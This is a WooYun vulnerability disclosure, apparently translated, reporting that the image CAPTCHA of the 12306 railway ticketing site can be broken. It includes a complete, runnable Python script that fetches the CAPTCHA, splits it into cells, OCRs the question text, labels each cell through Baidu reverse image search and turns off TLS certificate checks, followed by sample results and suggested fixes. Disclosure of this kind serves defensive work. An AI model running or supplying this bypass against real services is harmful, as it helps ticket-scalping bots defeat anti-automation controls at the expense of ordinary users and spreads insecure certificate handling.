
Vulnerability summary

Defect ID: wooyun-2015-0102178

Vulnerability title: 12306's latest CAPTCHA can be cracked (and can still be used by ticket-grabbing software)

Vendor: 12306

Author: zph

Submitted: 2015-03-18 20:52

Fixed: 2015-03-18 22:08

Published: 2015-03-18 22:08

Vulnerability type: Design flaw / logic error

Severity: High

Self-assessed rank: 10

Status: Vendor notified of the vulnerability, but the vendor ignored it

Source: http://www.wooyun.org. For questions or assistance, contact [email protected]



Vulnerability details

Disclosure status:

2015-03-18: Details sent to the vendor, awaiting vendor response
2015-03-18: Vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

Has nobody reported this yet? As I recall, this bizarre CAPTCHA could be recognized by a certain public service a long time ago. (The verification code comes from a third party.)

Detailed description:

Using Google Images (http://images.google.com)
Code here (from: https://github.com/andelf/fuck12306)

#!/usr/bin/python
# FileName : fuck12306.py
# Author : MaoMao Wang <[email protected]>
# Created : Mon Mar 16 22:08:41 2015 by ShuYu Wang
# Copyright : Feather (c) 2015
# Description : fuck fuck 12306
# Time-stamp: <2015-03-17 10:57:44 andelf>
from PIL import Image
from PIL import ImageFilter
import urllib
import urllib2
import re
import json

# hack CERTIFICATE_VERIFY_FAILED
# https://github.com/mtschirs/quizduellapi/issues/2
import ssl
if hasattr(ssl, '_create_unverified_context'):
    ssl._create_default_https_context = ssl._create_unverified_context

UA = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36"
pic_url = "https://kyfw.12306.cn/otn/passcodeNew/getPassCodeNew?module=login&rand=sjrand&0.21191171556711197"


def get_img():
    # Download the CAPTCHA image to disk and open it with PIL.
    resp = urllib.urlopen(pic_url)
    raw = resp.read()
    with open("./tmp.jpg", 'wb') as fp:
        fp.write(raw)
    return Image.open("./tmp.jpg")


def get_sub_img(im, x, y):
    # Crop cell (x, y) out of the 4-column image grid below the question text.
    # Each cell is 67px square with a 5px gap; the grid starts at (5, 41).
    assert 0 <= x <= 3
    assert 0 <= y <= 2
    left = 5 + (67 + 5) * x
    top = 41 + (67 + 5) * y
    right = left + 67
    bottom = top + 67
    return im.crop((left, top, right, bottom))


def baidu_stu_lookup(im):
    # Upload one grid cell to Baidu's image search and return its keyword guesses.
    url = "http://stu.baidu.com/n/image?fr=html5&needRawImageUrl=true&id=WU_FILE_0&name=233.png&type=image%2Fpng&lastModifiedDate=Mon+Mar+16+2015+20%3A49%3A11+GMT%2B0800+(CST)&size="
    im.save("./query_temp_img.png")
    raw = open("./query_temp_img.png", 'rb').read()
    url = url + str(len(raw))
    req = urllib2.Request(url, raw, {'Content-Type': 'image/png', 'User-Agent': UA})
    resp = urllib2.urlopen(req)
    resp_url = resp.read()  # the upload endpoint returns a plain image URL
    url = "http://stu.baidu.com/n/searchpc?queryImageUrl=" + urllib.quote(resp_url)
    req = urllib2.Request(url, headers={'User-Agent': UA})
    resp = urllib2.urlopen(req)
    html = resp.read()
    return baidu_stu_html_extract(html)


def baidu_stu_html_extract(html):
    # Pull the embedded keyword list (a JSON string) out of the result page.
    #pattern = re.compile(r'<script type="text/javascript">(.*?)</script>', re.DOTALL | re.MULTILINE)
    pattern = re.compile(r"keywords:'(.*?)'")
    matches = pattern.findall(html)
    if not matches:
        return '[UNKNOWN]'
    json_str = matches[0]
    json_str = json_str.replace('\\x22', '"').replace('\\\\', '\\')
    #print json_str
    result = [item['keyword'] for item in json.loads(json_str)]
    return '|'.join(result) if result else '[UNKNOWN]'


def ocr_question_extract(im):
    # OCR the Chinese question text in the strip above the grid.
    # [email protected]:madmaze/pytesseract.git
    global pytesseract
    try:
        import pytesseract
    except ImportError:
        print "[ERROR] pytesseract not installed"
        return None
    im = im.crop((127, 3, 260, 22))
    im = pre_ocr_processing(im)
    # im.show()
    return pytesseract.image_to_string(im, lang='chi_sim').strip()


def pre_ocr_processing(im):
    # Estimate the background with a blur + max filter, subtract it from each
    # channel so the text stands out, then binarize the greyscale result.
    im = im.convert("RGB")
    width, height = im.size
    white = im.filter(ImageFilter.BLUR).filter(ImageFilter.MaxFilter(23))
    grey = im.convert('L')
    impix = im.load()
    whitepix = white.load()
    greypix = grey.load()
    for y in range(height):
        for x in range(width):
            greypix[x, y] = min(255, max(255 + impix[x, y][0] - whitepix[x, y][0],
                                         255 + impix[x, y][1] - whitepix[x, y][1],
                                         255 + impix[x, y][2] - whitepix[x, y][2]))
    new_im = grey.copy()
    binarize(new_im, 150)
    return new_im


def binarize(im, thresh=120):
    # Threshold a greyscale image in place to pure black and white.
    assert 0 < thresh < 255
    assert im.mode == 'L'
    w, h = im.size
    for y in xrange(0, h):
        for x in xrange(0, w):
            if im.getpixel((x, y)) < thresh:
                im.putpixel((x, y), 0)
            else:
                im.putpixel((x, y), 255)


if __name__ == '__main__':
    im = get_img()
    #im = Image.open("./tmp.jpg")
    print 'OCR Question:', ocr_question_extract(im)
    for y in range(2):
        for x in range(4):
            im2 = get_sub_img(im, x, y)
            result = baidu_stu_lookup(im2)
            print (y, x), result


With this, the 12306 CAPTCHA is completely defeated.

Proof of vulnerability:

[Image: 1.jpg]

[Image: 2.png]

[Image: 3.jpg]

> Results
(0, 0) 苹果充电器
(0, 1) 医师资格证|证件翻拍
(0, 2) 手机|手机皮套
(0, 3) 油炸薯条|炸暑条|双人
(1, 0) 手机套|苹果手机套|手机配件
(1, 1) 砂积石
(1, 2) [UNKOWN]
(1, 3) 波导|可转穿衣镜|手机


[Image: 4.jpg]


>
(0, 0) 靴|保温杯
(0, 1) 二粒小麦|刷子|成片种植
(0, 2) 香辣酱|瓶装调料|果酱
(0, 3) [UNKOWN]
(1, 0) 柚子|圆形果类
(1, 1) 雪饼
(1, 2) 李锦记|香辣酱|调料
(1, 3) 素菜

Suggested fix:

1. Don't use this kind of bizarre CAPTCHA. It is far too strange and sometimes blocks legitimate users.
2. Since ticket-grabbing software is fully automated, why not add a second verification step on top of the image CAPTCHA? An SMS code? Email confirmation?
Further options are left to your imagination, heh heh heh...

Copyright notice: when reposting, please credit the source: zph@WooYun


Vulnerability response

Vendor response:

Severity: No impact, vendor ignored

Ignored at: 2015-03-18 22:08

Vendor reply:

Two single-selection image answers, or similar non-answer images outnumbering the answer images.

Latest status:

None yet